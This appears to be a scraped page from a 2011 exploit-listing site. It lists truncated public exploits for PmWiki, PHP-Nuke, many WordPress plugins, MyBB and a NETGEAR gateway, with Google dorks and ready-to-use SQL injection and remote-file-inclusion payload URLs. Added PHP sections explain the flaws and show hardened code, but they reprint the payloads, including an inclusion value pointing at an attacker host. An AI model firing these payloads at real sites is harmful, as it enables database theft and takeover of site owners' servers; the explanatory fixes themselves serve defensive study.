PmWiki

23/11/2011

<?php /*     ————————————————————-     PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit     ————————————————————-          author……………: Egidio Romano aka EgiX     mail……………..: n0b0d13s[at]gmail[dot]com     software link……..: http://www.pmwiki.org/     affected versions….: from 2.0.0 to 2.2.34          +————————————————————————-+     | This proof of concept code was written for educational purpose only.    |     | Use it at your own risk. Author will be …

PHP-Nuke

23/11/2011

#!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, #               Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # …

WordPress jetpack plugin SQL Injection Vulnerability

21/11/2011

###################################################### # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability # Date: 2011-19-11 # Author: longrifle0x # software: WordPress # Download: http://wordpress.org/extend/plugins/jetpack/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in jetpack, WordPress Plugin, vulnerability is SQL injection. File: wp-content/plugins/jetpack/modules/sharedaddy.php Exploit: id=-1; or 1=if *Exploitation* http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER() http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 …

OSX universal ROP shellcode, tested on SNOW LEOPARD

03/10/2011

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don't want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; - put your 'normal' shellcode in x64_shellcode.asm ; - make ; - ./sc ; ; if you want …

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

23/09/2011

Sense of Security – Security Advisory – SOS-11-011 Release Date. 20-Sep-2011 Last Update. – Vendor Notification Date. 22-Mar-2011 Product. NETGEAR Wireless Cable Modem Gateway CG814WG Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others Severity Rating. High Impact. Authentication bypass, Cross Site Request Forgery Attack Vector. Remote without authentication Solution Status. Upgrade to R15 …

JAKCMS PRO

23/09/2011

# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 Source: http://www.exploit-db.com/exploits/17882/

Multiple WordPress Plugin timthumb.php Vulnerabilites

23/09/2011

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) --- Description --- The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com …
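The advisory above hinges on how the "allowed site" check is written: a hostname such as blogger.com.evil.com passes a check that only looks for an allowed name somewhere in the URL string. The following PHP is an added example written for this page, not timthumb's code nor any listed plugin's; it puts that substring-style check beside one that compares the parsed hostname, and runs both over a handful of constructed URLs (the allowlist entries and attacker hosts are made up for illustration).

```php
<?php
// Added example, not timthumb's or any listed plugin's own code. It contrasts the
// substring-style "allowed site" check that the blogger.com.evil.com trick defeats
// with a check on the parsed hostname. The allowlist and URLs are constructed.
declare(strict_types=1);

$allowed_sites = ['blogger.com', 'wordpress.com', 'img.youtube.com'];

// Flawed check: true if an allowed name appears ANYWHERE in the URL string.
function allowed_by_substring(string $src, array $allowed): bool
{
    $lower = strtolower($src);
    foreach ($allowed as $site) {
        if (strpos($lower, strtolower($site)) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened check: parse the URL, require http(s), and compare the real host to the
// allowlist as an exact match or a dot-anchored subdomain.
function allowed_by_host(string $src, array $allowed): bool
{
    $parts = parse_url($src);
    if ($parts === false || empty($parts['host'])) {
        return false;                                   // relative paths, data:, etc.
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if ($scheme !== 'http' && $scheme !== 'https') {
        return false;                                   // php://, ftp://, phar:// ...
    }
    $host = strtolower(rtrim($parts['host'], '.'));     // "blogger.com." is "blogger.com"
    foreach ($allowed as $site) {
        $site = strtolower($site);
        $suffix = '.' . $site;
        if ($host === $site || substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Constructed test URLs; the second one is the shape the advisory describes.
$urls = [
    'http://img.blogger.com/photo.gif',          // legitimate subdomain
    'http://blogger.com.evil.com/shell.gif',     // allowed name as prefix of an attacker host
    'http://evil.com/blogger.com/shell.gif',     // allowed name in the path
    'http://blogger.com@evil.com/shell.gif',     // allowed name as userinfo, host is evil.com
    'php://filter/resource=blogger.com',         // stream wrapper, not a web fetch at all
];
foreach ($urls as $url) {
    printf("%-42s substring:%-5s host:%s\n", $url,
        allowed_by_substring($url, $allowed_sites) ? 'pass' : 'deny',
        allowed_by_host($url, $allowed_sites) ? 'pass' : 'deny');
}
```

Run with `php` on the command line: the substring check passes every URL in the list, the host check passes only the first. Host allowlisting is only the first layer, though. The PHP appended to a well-formed GIF can only run if the fetched file ends up somewhere the web server executes PHP, so remote fetches belong outside the document root or under a non-executable name, and re-encoding the image through GD (imagecreatefromgif followed by imagegif) discards any bytes trailing the image data.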

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011

Sense of Security - Security Advisory - SOS-11-010 Release Date. 19-Sep-2011 Last Update. - Vendor Notification Date. 21-Feb-2011 Product. Cisco TelePresence Series Platform. Cisco Affected versions. C <= TC4.1.2, MXP

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI --- Vulnerable Code --- // Move folder request handled when called by GET AJAX if (isset($_GET['ru_folder'])) { // WP setup …

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) --- PoC --- http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widget/wp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) --- Vulnerable Code --- if (isset($_FILES['wpmm-upload'])) { …
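Both the Relocate Upload and the Mini Mail Dashboard Widget PoCs above work the same way: the plugin file bootstraps WordPress itself and takes the install root from an `abspath` request parameter. The PHP below is an added example written for this page, not either plugin's code. It shows that bootstrap shape, a filter that rejects wrapper and traversal values, and a bootstrap that never consults the request. The attacker host, the sample `abspath` values and the directory layout are constructed assumptions.

```php
<?php
// Added example, not the Relocate Upload or Mini Mail Dashboard Widget plugins' own
// code. It shows the request-controlled bootstrap shape both PoCs abuse, a filter that
// rejects wrapper and traversal values, and a bootstrap that does not consult the
// request at all. All paths and hosts below are constructed.
declare(strict_types=1);

// Vulnerable shape: the client chooses where wp-load.php is loaded from. With
// allow_url_include=On that is remote file inclusion; with it Off it is still local
// file inclusion of any readable path.
function bootstrap_path_vulnerable(array $get): string
{
    return $get['abspath'] . '/wp-load.php';
}

// Rejects stream wrappers (http://, php://, data:, phar://, ...), protocol-relative and
// UNC prefixes, parent-directory segments and null bytes. A scheme must be two or more
// characters so a Windows drive letter such as C:\ does not trip the check.
function looks_like_remote_or_traversal(string $path): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $path)) {
        return true;
    }
    if (strncmp($path, '//', 2) === 0 || strncmp($path, '\\\\', 2) === 0) {
        return true;
    }
    if (strpos($path, "\0") !== false) {
        return true;
    }
    foreach (preg_split('#[\\\\/]+#', $path) as $segment) {
        if ($segment === '..') {
            return true;
        }
    }
    return false;
}

// Hardened shape: derive the install root from the plugin file's own location.
// <root>/wp-content/plugins/<plugin>/<file>.php sits four directories below <root>.
function bootstrap_path_fixed(string $plugin_file): ?string
{
    $root = dirname(dirname(dirname(dirname($plugin_file))));
    $real = realpath($root . DIRECTORY_SEPARATOR . 'wp-load.php');
    return ($real !== false && is_file($real)) ? $real : null;
}

// Constructed abspath values an attacker might send, plus one plain path.
$attempts = [
    'http://attacker.example/shell.txt?',   // classic RFI: the appended /wp-load.php becomes a query string
    'php://input',                          // executes the POST body
    'data:text/plain,<?php phpinfo();',     // inline PHP, no network needed
    '../../../../etc',                      // traversal probe, LFI rather than RFI
    '/var/www/html',                        // passes the filter, but is still attacker-chosen
];
foreach ($attempts as $abspath) {
    printf("%-40s blocked=%s\n", $abspath,
        looks_like_remote_or_traversal($abspath) ? 'yes' : 'no');
}
echo 'bootstrap_path_fixed: ',
    bootstrap_path_fixed(__FILE__) ?? 'no wp-load.php four levels above this script', "\n";
```

The filter is defence in depth, not the fix: the last entry passes it and is still a path the attacker chose. The fix is `bootstrap_path_fixed`, which ignores the request entirely. In WordPress the cleaner design is not to bootstrap from a plugin file at all: register a `wp_ajax_` handler, call it through admin-ajax.php, and check a nonce and a capability inside it.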

WordPress PureHTML plugin

06/09/2011

# Exploit Title: WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- Vulnerable code --------------- if(!isset($_POST['PureHTMLNOnce'])){ if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], …

WordPress yolink Search plugin

06/09/2011

# Exploit Title: WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] …

WordPress wp audio gallery playlist plugin

06/09/2011

# Exploit Title: WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip # Version: 0.12 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20 --------------- Vulnerable code --------------- $table_name = $wpdb->prefix …

WordPress Crawl Rate Tracker plugin

06/09/2011

# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { …

WordPress Event Registration plugin

06/09/2011

# Exploit Title: WordPress Event Registration plugin <= 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- Vulnerable code --------------- $id= $_REQUEST['id']; … $sql = "SELECT * …

WordPress Contus HD FLV Player plugin

18/08/2011

# Exploit Title: WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip # Version: 1.3 (tested) --- PoC --- http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1 --------------- Vulnerable code --------------- $pid1 = $_GET['playid']; foreach ($_GET['listItem'] as $position => $item) : mysql_query("UPDATE $wpdb->prefix" . …

WordPress File Groups plugin

18/08/2011

# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip # Version: 1.1.2 (tested) --- PoC --- http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121))) --------------- Vulnerable code --------------- $fgid = $_GET['fgid']; ... $file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid"); http://www.exploit-db.com/exploits/17677/
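The SQL injection advisories above fall into two shapes: an unquoted integer context (File Groups `fgid`, Contus `playid`), where the note "magic_quotes has to be turned off" is absent, and a quoted string context (Crawl Rate Tracker `page_url`, Event Registration `id`, PureHTML, wp audio gallery playlist), where it is present. The PHP below is an added example written for this page, not any of the plugins' code. It renders both query shapes with the page's own payloads, simulates magic_quotes_gpc to show why the note applies to one shape only, and shows the `%d` / `%s` placeholder style of `$wpdb->prepare()` through a small stand-in so the script runs without WordPress or a database. The table and column names for the string case are assumed.

```php
<?php
// Added example, not the File Groups, Crawl Rate Tracker or any other plugin's own code.
// It renders the query shapes from the advisories above with the page's own payloads,
// simulates magic_quotes_gpc, and shows the %d / %s placeholder style of WordPress's
// $wpdb->prepare() through a small stand-in. No database is needed: every function
// returns the SQL text that would be sent. Table and column names for the string case
// are assumed.
declare(strict_types=1);

// Unquoted integer context, as in File Groups download.php and Contus process-sortable.php.
function vulnerable_int(string $fgid): string
{
    return "select guid from wp_posts where post_parent = $fgid";
}

// Quoted string context, as in Crawl Rate Tracker sbtracking-chart-data.php (page_url).
function vulnerable_str(string $page_url): string
{
    return "SELECT hits FROM wp_sbtracking WHERE page_url = '$page_url'";
}

// Stand-in for $wpdb->prepare(): %d casts to int, %s escapes and quotes. Real plugin
// code should call $wpdb->prepare() itself, whose escaping is charset-aware.
function prepare_stub(string $sql, array $args): string
{
    $i = 0;
    return preg_replace_callback('/%([ds])/', function (array $m) use ($args, &$i): string {
        $value = $args[$i++];
        return $m[1] === 'd'
            ? (string) (int) $value                       // "-1 AND 1=..." becomes -1
            : "'" . addslashes((string) $value) . "'";
    }, $sql);
}

function fixed_int(string $fgid): string
{
    // $wpdb->posts rather than a hard-coded wp_posts would also respect the table prefix.
    return prepare_stub('SELECT guid FROM wp_posts WHERE post_parent = %d', [$fgid]);
}

function fixed_str(string $page_url): string
{
    return prepare_stub('SELECT hits FROM wp_sbtracking WHERE page_url = %s', [$page_url]);
}

// Payloads copied from the File Groups and Crawl Rate Tracker PoCs on this page.
$int_payload = '-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))';
$str_payload = "-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))-- ";

foreach ([false, true] as $magic_quotes) {
    // magic_quotes_gpc backslash-escaped quotes in request data; addslashes() reproduces it.
    $int_in = $magic_quotes ? addslashes($int_payload) : $int_payload;
    $str_in = $magic_quotes ? addslashes($str_payload) : $str_payload;
    echo 'magic_quotes ', $magic_quotes ? 'on' : 'off', ":\n";
    echo '  vulnerable_int: ', vulnerable_int($int_in), "\n";
    echo '  vulnerable_str: ', vulnerable_str($str_in), "\n";
}
echo 'fixed_int:      ', fixed_int($int_payload), "\n";
echo 'fixed_str:      ', fixed_str($str_payload), "\n";
```

Run with `php` on the command line. With magic_quotes on, the string payload comes through as `-1\' AND ...` and stays inside the literal, which is why those advisories require it off; the integer payload contains no quote, so magic_quotes changes nothing and the BENCHMARK still runs. `fixed_int` renders `post_parent = -1` because PHP's integer cast keeps only the leading numeric prefix, and `fixed_str` keeps the whole payload inside a quoted, escaped literal.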

WP E-commerce plugin

08/08/2011

# Exploit Title: WP E-commerce plugin <= 3.8.4 Sql Injection # Google Dork: inurl:page_id= "Your billing/contact details" # Date: 18/07/2011 # Author: IHTeam # Software Link: http://www.getshopped.org/ # Version: 3.8.4 # Tested on: 3.8.4 # Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/

Joomla Component (com_jdirectory) SQL Injection Vulnerability

08/08/2011


MyBB MyTabs (plugin) 0day SQL injection vulnerability

08/08/2011

===================================================================== MyBB 0day MyTabs (plugin) SQL injection vulnerability ===================================================================== # Exploit title : MyBB 0day MyTabs (plugin) SQL injection vulnerability. # Author: AutoRUN & dR.sqL # Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com # Date : 01 08 2011 # Tested on : Windows XP , Linux # Category : web apps # …